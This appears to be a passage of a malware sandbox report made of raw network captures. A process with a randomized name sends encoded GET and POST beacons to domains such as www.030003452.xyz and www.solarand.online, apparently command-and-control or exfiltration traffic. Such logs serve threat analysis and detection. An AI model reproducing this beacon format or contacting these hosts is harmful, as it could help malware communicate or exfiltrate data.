59 61 57 55 45 32 58 6c 38 75 36 45 76 74 4c 70 64 59 52 76 4e 59 64 4d 75 48 2f 6b 69 30 48 52 61 34 6c 78 73 50 33 6c 38 65 47 4c 45 6d 33 41 57 [TRUNCATED] Data Ascii: m2gpQ=Vd+ehal1jVcDVs/WsAA6cAOiRjsIjMkUWgZxkKeMFhAuzYON2ZyPkGGJNYCW1KPUNwaLfb4Z855PL50DH2/bsnP703GC9RmUmY6i7NCf2TOGMTAN4OhqDxBBat2zaxczpk9NxjxcSqH+cCqIWaBLiu39+WFDUMPuIzX7F8t+56zCwAKwMtObQTPY/tgSLapZz7JurLJ83XvADeuwxKVRy4h95IzFhbca5+ZHWMvdJA1fnh51lUC+c0hJb4QnStgucJDw0V45nCoJzajiES5kmJ9Gfx6YaWUE2Xl8u6EvtLpdYRvNYdMuH/ki0HRa4lxsP3l8eGLEm3AWR++Oreh358YboqGa+ZCDl+OKDH3XFXPoR3KjC7JfvCnJm9L7SUm59MSPo2ArFGncZnm9fISrQRdLDlEMKAlqTUE8DpMQOWJRfqHCqyJiQ56KpLcpgu5AK1ot0OOq20JCJhMKSxIXcojANfPZeLd7i03As5gN2b/H56DwolDfKh8JgiIFlrr/DztTw9RWcCa48TdSnn3+9Szlp3O+UI3BsaWw0yiv9OlFwj0A+erA+Zfi0ZeBwi2d4dKBOmi4A5GekGbGmRdNvY/Lj5Sqy4G2ssQWqQNveg+hXhJ3zGvZ1iSabzQmhxDXle/x78QVcHLFAJIcRIm83fqN0NglqW0prXXQmZKycffmEeA0x6Me3j/JucgNsGY1BkEbVEMO3JmpXY1wp7aEH2jMy3g9z+3xjCt0ORuDeKlp2gVCkrkVa7P1lnSi2gg5UYBzRkIP+wlgk2QpIkewrg3RQAlDmrkXJqsl/4i37ZZv9237vDJ8jqKfkKrO9lE3+TXG5509LWPR3LAyCZfmwHeU20AC3dRB0LkTlUTXCQAxelBG0Dt+pl1+D+emDfZ8FmtfsVVT89SKEV3VHfDvKdKVNZRG72X21vH/Pdnm4J3UPw+eLNGdufLef72xsH02oA4ZvCCDzuGF6FYF0YFcPNBz84ejAYEdHp9DMQDuHPW5kL [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.7	50018	217.160.0.60	80	5364	C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 07:57:48.770927906 CET	494	OUT	GET /1jhj/?m2gpQ=YfW+isNxg3o3M+3b8iUoLSe7bztYi80mfWBugJ2MJlsi+oKL/t+PoAeEH7mT5YnCbxa2fokj9utgMIVvF1qc1kyP51+K5wadj8Hc7obOiRyGIBJp8NxnCEZeYebMQAIMmW1V2iVRSYza&KjH=KRIxdVHP60TD8 HTTP/1.1 Host: www.solarand.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2
Nov 12, 2024 07:57:49.604593039 CET	1236	IN	HTTP/1.1 200 OK Content-Type: text/html Content-Length: 4545 Connection: close Date: Tue, 12 Nov 2024 06:57:49 GMT Server: Apache Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 53 54 52 41 54 4f 20 2d 20 44 6f 6d 61 69 6e 20 72 65 73 65 72 76 65 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 4f 70 65 6e 20 53 61 6e 73 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 6d 61 72 67 69 6e 3a 20 30 3b 22 3e 0d 0a 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 33 66 33 66 33 3b 20 70 61 64 64 69 6e 67 3a 20 34 30 70 78 20 30 3b 20 77 69 64 74 68 3a 20 31 30 30 25 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 20 31 35 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d [TRUNCATED] Data Ascii: <!DOCTYPE html><html> <head> <title>STRATO - Domain reserved</title> </head> <body style="background-color: #fff; font-family: Open Sans, sans-serif; padding: 0; margin: 0;"> <div style="background-color: #f3f3f3; padding: 40px 0; width: 100%;"> <div style="width: 150px; margin-left: auto; margin-right: auto;"><a href="https://www.strato.de" rel="nofollow" style="border: 0;"> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 157.4 33.7"><defs><style>.a{fill:#f80;}.b{fill:#f80;}</style></defs><title>STRATO</title><path class="a" d="M17.8,7a4.69,4.69,0,0,1-4.7-4.7H29.6A4.69,4.69,0,0,1,34.3,7V23.5a4.69,4.69,0,0,1-4.7-4.7V9.4A2.37,2.37,0,0,0,27.2,7Z" transform="translate(-1.3 -2.3)"/><path class="b" d="M57.7,32.9c-1.3,2.5-4.7,2.6-7.3,2.6-2.1,0-4-.1-5.2-.2-1.5-.1-1.8-.5-1.8-1.3V32.9c0-1.3.2-1.7,1.4-1.7,2.1,0,3.1.2,6.2.2,2.4,0,2.9-.2,2.9-2.3,0-2.4,0-2.5-1.3-3.1a42.2,42.2,0,0,0-4.5-1.8c-3.7-1.6-4.4-2.3-4.4-6.5,0-2.6.5-4.8,3.4-5.7a14,14,0,0,1,4.9-.6c1.6, [TRUNCATED]
Nov 12, 2024 07:57:49.604610920 CET	1236	IN	Data Raw: 33 2c 30 2c 31 2e 36 2c 31 2e 33 2c 32 2e 31 2e 39 2e 35 2c 32 2c 2e 38 2c 32 2e 39 2c 31 2e 33 2c 34 2e 39 2c 32 2e 31 2c 36 2c 32 2e 35 2c 36 2c 36 2e 37 61 31 30 2e 31 32 2c 31 30 2e 31 32 2c 30 2c 30 2c 31 2d 2e 36 2c 34 2e 38 4d 37 37 2e 31 Data Ascii: 3,0,1.6,1.3,2.1.9.5,2,.8,2.9,1.3,4.9,2.1,6,2.5,6,6.7a10.12,10.12,0,0,1-.6,4.8M77.1,15.7c-2.1,0-3.7,0-5.2-.1v18a1.4,1.4,0,0,1-1.5,1.6H69c-1.1,0-1.7-.3-1.7-1.6V15.7c-1.5,0-3.2.1-5.3.1-1.5,0-1.5-.9-1.5-1.6v-.9A1.36,1.36,0,0,1,62,11.8H77.2c.8,0,1.
Nov 12, 2024 07:57:49.604623079 CET	1236	IN	Data Raw: 35 73 2d 2e 36 2c 37 2e 31 2d 32 2e 36 2c 39 2e 35 4d 31 35 33 2c 31 37 2e 34 63 2d 2e 38 2d 31 2e 36 2d 32 2e 34 2d 32 2e 33 2d 34 2e 34 2d 32 2e 33 73 2d 33 2e 36 2e 36 2d 34 2e 34 2c 32 2e 33 63 2d 2e 37 2c 31 2e 35 2d 2e 38 2c 34 2e 34 2d 2e Data Ascii: 5s-.6,7.1-2.6,9.5M153,17.4c-.8-1.6-2.4-2.3-4.4-2.3s-3.6.6-4.4,2.3c-.7,1.5-.8,4.4-.8,6.1s.1,4.6.8,6.1,2.4,2.3,4.4,2.3,3.6-.7,4.4-2.3.8-4.2.8-6.1-.1-4.6-.8-6.1" transform="translate(-1.3 -2.3)"/><path class="a" d="M24.9,14a2.26,2.26,0,0,0-2.3-2.
Nov 12, 2024 07:57:49.604635000 CET	975	IN	Data Raw: 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 22 20 6c 61 6e 67 3d 22 6e 6c 22 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 20 63 6f 6c 6f 72 3a 20 23 37 37 37 3b 20 66 6f 6e 74 2d 77 65 Data Ascii: padding-bottom: 30px" lang="nl"><span style="font-size: 14px; color: #777; font-weight: bold;">Nederlands</span><br>Deze website werd zojuist geregistreerd. Een webinhoud werd nog niet toegevoegd.</div> <div style="padding-bottom: 30px"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.7	50019	161.97.142.144	80	5364	C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 07:57:54.842394114 CET	749	OUT	POST /7nfi/ HTTP/1.1 Host: www.030003452.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en Origin: http://www.030003452.xyz Cache-Control: max-age=0 Content-Length: 218 Content-Type: application/x-www-form-urlencoded Connection: close Referer: http://www.030003452.xyz/7nfi/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2 Data Raw: 6d 32 67 70 51 3d 4b 65 63 5a 4f 38 67 55 65 58 7a 53 65 46 52 67 4a 6f 74 39 36 39 56 69 63 38 57 43 72 62 4e 39 65 56 77 33 6b 2f 43 51 44 4d 4b 4b 32 4a 61 6f 74 59 32 4e 33 36 2b 37 39 73 43 75 41 7a 66 38 2f 74 75 36 37 79 46 67 75 4e 35 4a 72 69 74 47 70 76 6c 34 69 73 52 59 51 54 30 48 2b 4a 47 52 57 32 31 68 63 4f 30 2b 4d 54 59 73 65 37 48 63 70 4a 35 2b 68 68 72 6c 66 57 6a 37 66 4c 57 46 6e 4e 6e 52 32 52 41 74 6d 4e 4a 46 2b 56 2f 69 42 42 44 68 4e 66 52 69 67 62 35 52 73 6c 73 52 5a 4d 33 76 66 74 6b 75 6e 6c 61 6f 62 2f 61 75 50 6f 7a 45 4a 2f 75 63 48 68 6d 67 32 4f 4d 76 62 31 70 52 57 31 4f 50 37 6a 71 30 61 37 58 4d 68 41 3d 3d Data Ascii: m2gpQ=KecZO8gUeXzSeFRgJot969Vic8WCrbN9eVw3k/CQDMKK2JaotY2N36+79sCuAzf8/tu67yFguN5JritGpvl4isRYQT0H+JGRW21hcO0+MTYse7HcpJ5+hhrlfWj7fLWFnNnR2RAtmNJF+V/iBBDhNfRigb5RslsRZM3vftkunlaob/auPozEJ/ucHhmg2OMvb1pRW1OP7jq0a7XMhA==
Nov 12, 2024 07:57:56.063591003 CET	1236	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 12 Nov 2024 06:57:55 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding ETag: W/"66cce1df-b96" Content-Encoding: gzip Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED] Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z\|Q&8UjXB]O;g}\|5@Ro&i<b)~KmA5n)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V\|NRkPqcq?mDEN&BFtKGQ/xI %iO\|CqCJAtV"\|"@(3'!A>0HpL(pHP8G,$Qc
Nov 12, 2024 07:57:56.063621998 CET	370	IN	Data Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0 Data Ascii: (aL`!I>:8%>!+F3\|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.7	50020	161.97.142.144	80	5364	C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 07:57:57.385571957 CET	769	OUT	POST /7nfi/ HTTP/1.1 Host: www.030003452.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en Origin: http://www.030003452.xyz Cache-Control: max-age=0 Content-Length: 238 Content-Type: application/x-www-form-urlencoded Connection: close Referer: http://www.030003452.xyz/7nfi/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2 Data Raw: 6d 32 67 70 51 3d 4b 65 63 5a 4f 38 67 55 65 58 7a 53 66 6b 68 67 4c 4c 46 39 74 74 56 68 57 63 57 43 69 37 4e 48 65 56 38 33 6b 39 75 41 43 2b 75 4b 34 4d 6d 6f 73 5a 32 4e 30 36 2b 37 6b 63 43 33 45 7a 65 2b 2f 74 79 4d 37 32 4e 67 75 4e 39 4a 72 6d 70 47 70 59 52 37 77 4d 52 65 59 7a 30 46 67 35 47 52 57 32 31 68 63 4f 52 70 4d 54 51 73 66 50 37 63 70 74 74 39 6f 42 72 6d 59 57 6a 37 49 62 57 42 6e 4e 6e 76 32 51 73 48 6d 4c 4e 46 2b 51 37 69 47 51 44 75 57 76 52 6b 75 37 34 42 73 6b 31 34 44 39 62 71 65 73 63 51 68 30 65 75 54 70 62 4d 56 4b 2f 6f 58 75 57 6e 44 6a 43 57 68 6f 52 61 5a 30 74 4a 62 58 36 75 6b 55 50 65 58 70 32 49 33 39 43 44 47 5a 53 67 4d 35 34 56 42 30 41 67 43 55 36 68 54 48 51 3d Data Ascii: m2gpQ=KecZO8gUeXzSfkhgLLF9ttVhWcWCi7NHeV83k9uAC+uK4MmosZ2N06+7kcC3Eze+/tyM72NguN9JrmpGpYR7wMReYz0Fg5GRW21hcORpMTQsfP7cptt9oBrmYWj7IbWBnNnv2QsHmLNF+Q7iGQDuWvRku74Bsk14D9bqescQh0euTpbMVK/oXuWnDjCWhoRaZ0tJbX6ukUPeXp2I39CDGZSgM54VB0AgCU6hTHQ=
Nov 12, 2024 07:57:58.407490015 CET	1236	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 12 Nov 2024 06:57:58 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding ETag: W/"66cce1df-b96" Content-Encoding: gzip Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED] Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z\|Q&8UjXB]O;g}\|5@Ro&i<b)~KmA5n)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V\|NRkPqcq?mDEN&BFtKGQ/xI %iO\|CqCJAtV"\|"@(3'!A>0HpL(pHP8G,$Qc
Nov 12, 2024 07:57:58.407506943 CET	370	IN	Data Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0 Data Ascii: (aL`!I>:8%>!+F3\|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.7	50021	161.97.142.144	80	5364	C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 07:58:00.166924000 CET	1782	OUT	POST /7nfi/ HTTP/1.1 Host: www.030003452.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en Origin: http://www.030003452.xyz Cache-Control: max-age=0 Content-Length: 1250 Content-Type: application/x-www-form-urlencoded Connection: close Referer: http://www.030003452.xyz/7nfi/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2 Data Raw: 6d 32 67 70 51 3d 4b 65 63 5a 4f 38 67 55 65 58 7a 53 66 6b 68 67 4c 4c 46 39 74 74 56 68 57 63 57 43 69 37 4e 48 65 56 38 33 6b 39 75 41 43 2b 6d 4b 34 2b 65 6f 73 36 65 4e 31 36 2b 37 73 38 43 79 45 7a 66 6d 2f 74 36 51 37 32 4a 77 75 4f 56 4a 6b 6a 39 47 72 74 39 37 36 4d 52 65 61 7a 30 47 2b 4a 47 45 57 79 52 74 63 4f 42 70 4d 54 51 73 66 4a 66 63 35 70 35 39 6b 68 72 6c 66 57 6a 42 66 4c 58 6d 6e 4e 66 5a 32 51 6f 39 6e 37 74 46 6e 77 4c 69 44 6d 76 75 4c 66 52 6d 74 37 35 45 73 6b 4a 6a 44 35 44 63 65 73 6f 36 68 32 65 75 41 66 79 33 51 76 66 46 55 38 4f 6c 66 52 61 37 70 62 6c 41 52 58 70 6d 5a 46 47 2b 75 69 72 77 51 50 65 48 78 36 75 50 65 62 61 51 45 70 63 6b 52 6a 70 49 59 31 6a 69 4d 69 62 76 6e 5a 72 4e 4c 2f 4f 2b 69 77 65 51 57 50 6c 34 77 76 45 6a 30 4a 41 50 4d 77 46 6e 51 73 2b 37 55 72 2b 56 78 6f 4d 77 6c 79 54 4a 4d 2b 50 64 31 6d 52 76 65 77 7a 65 4c 45 55 68 68 4c 4f 36 70 74 77 7a 4f 79 45 34 72 41 43 64 6a 4c 77 42 5a 33 31 32 46 4a 4d 38 35 68 36 72 43 37 66 39 79 6c 51 6c [TRUNCATED] Data Ascii: m2gpQ=KecZO8gUeXzSfkhgLLF9ttVhWcWCi7NHeV83k9uAC+mK4+eos6eN16+7s8CyEzfm/t6Q72JwuOVJkj9Grt976MReaz0G+JGEWyRtcOBpMTQsfJfc5p59khrlfWjBfLXmnNfZ2Qo9n7tFnwLiDmvuLfRmt75EskJjD5Dceso6h2euAfy3QvfFU8OlfRa7pblARXpmZFG+uirwQPeHx6uPebaQEpckRjpIY1jiMibvnZrNL/O+iweQWPl4wvEj0JAPMwFnQs+7Ur+VxoMwlyTJM+Pd1mRvewzeLEUhhLO6ptwzOyE4rACdjLwBZ312FJM85h6rC7f9ylQl4EYgi4bYugBPL8LN+bVhwJxS/FNrM3ZZM7dAdPx0dUZHu86PZq5chh/ixv1CNoNjIR0ggyqVXP7VBRy629YGCDiqf6bGoR4U95Mra8jCgg3r7vDYxF0bt11VDbjNst/h4RLYhm5Y+bJVSnFaSwdM28cj8ndTIgWgZLaDq3vyFq80eDX8PnJT2/ZnQbLSrh+9lceNQT6i+JbpO1yau3ZdXbZKKAf345uxwzpz/daAmaFk6SH/yuE6ts4lWHpcNz/f/hrzYGor1pWcE02B2e+JlAltywjENg7LaBRU+GwD8gSfhWofkh0u5T5dDc61czsgoM+15n2FNkS0/ILoYTnz0Epz/vSIxfHr4QCqkc/w65V2vlKsXSMYpmSTsglqd6xVXdm8oLdH2Oa/X2HCk+TWl9HYjiyMKDg1UlIJtqp0v1+xR6ijpyGZJ2vBfHkrEop7vSwCB3YUE4yRw/APmUTFA8c7ghuA+yh4YPeGyrPyDW5kKXs8+Jrxf4MrjdOPi8CaD4J8VcTgDyfBKGRUsa4H/W8lFllTuaVGOTgqvqvd2XtjR4mmV3CCGSTRFdBc24Og7OWmnXb1aB1qzy1ooYvrPQTXexI0mOuFXgSGAHZGQQ6TbqSRbEBMv9CS6IlC76VXGc3zWXofDEjp9p3lbeZwZZB6LtInwvaSuH [TRUNCATED]
Nov 12, 2024 07:58:01.078463078 CET	1236	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 12 Nov 2024 06:58:00 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding ETag: W/"66cce1df-b96" Content-Encoding: gzip Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED] Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z\|Q&8UjXB]O;g}\|5@Ro&i<b)~KmA5n)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V\|NRkPqcq?mDEN&BFtKGQ/xI %iO\|CqCJAtV"\|"@(3'!A>0HpL(pHP8G,$Qc
Nov 12, 2024 07:58:01.078481913 CET	370	IN	Data Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0 Data Ascii: (aL`!I>:8%>!+F3\|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.7	50022	161.97.142.144	80	5364	C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 07:58:02.754405975 CET	492	OUT	GET /7nfi/?m2gpQ=Hc05NKMVGljRJ208GoJiuvJwS+qtlqhBfxwxnuqPPp/t3suBlIaw+qLklfi1FFvtvcqP4hR32up8rQp3nsg47f9wbTR1iuyCcnVpZrM4KA8DS5fnn6F+xl7ZQWTXNpehtq7GmXwpqKtZ&KjH=KRIxdVHP60TD8 HTTP/1.1 Host: www.030003452.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2
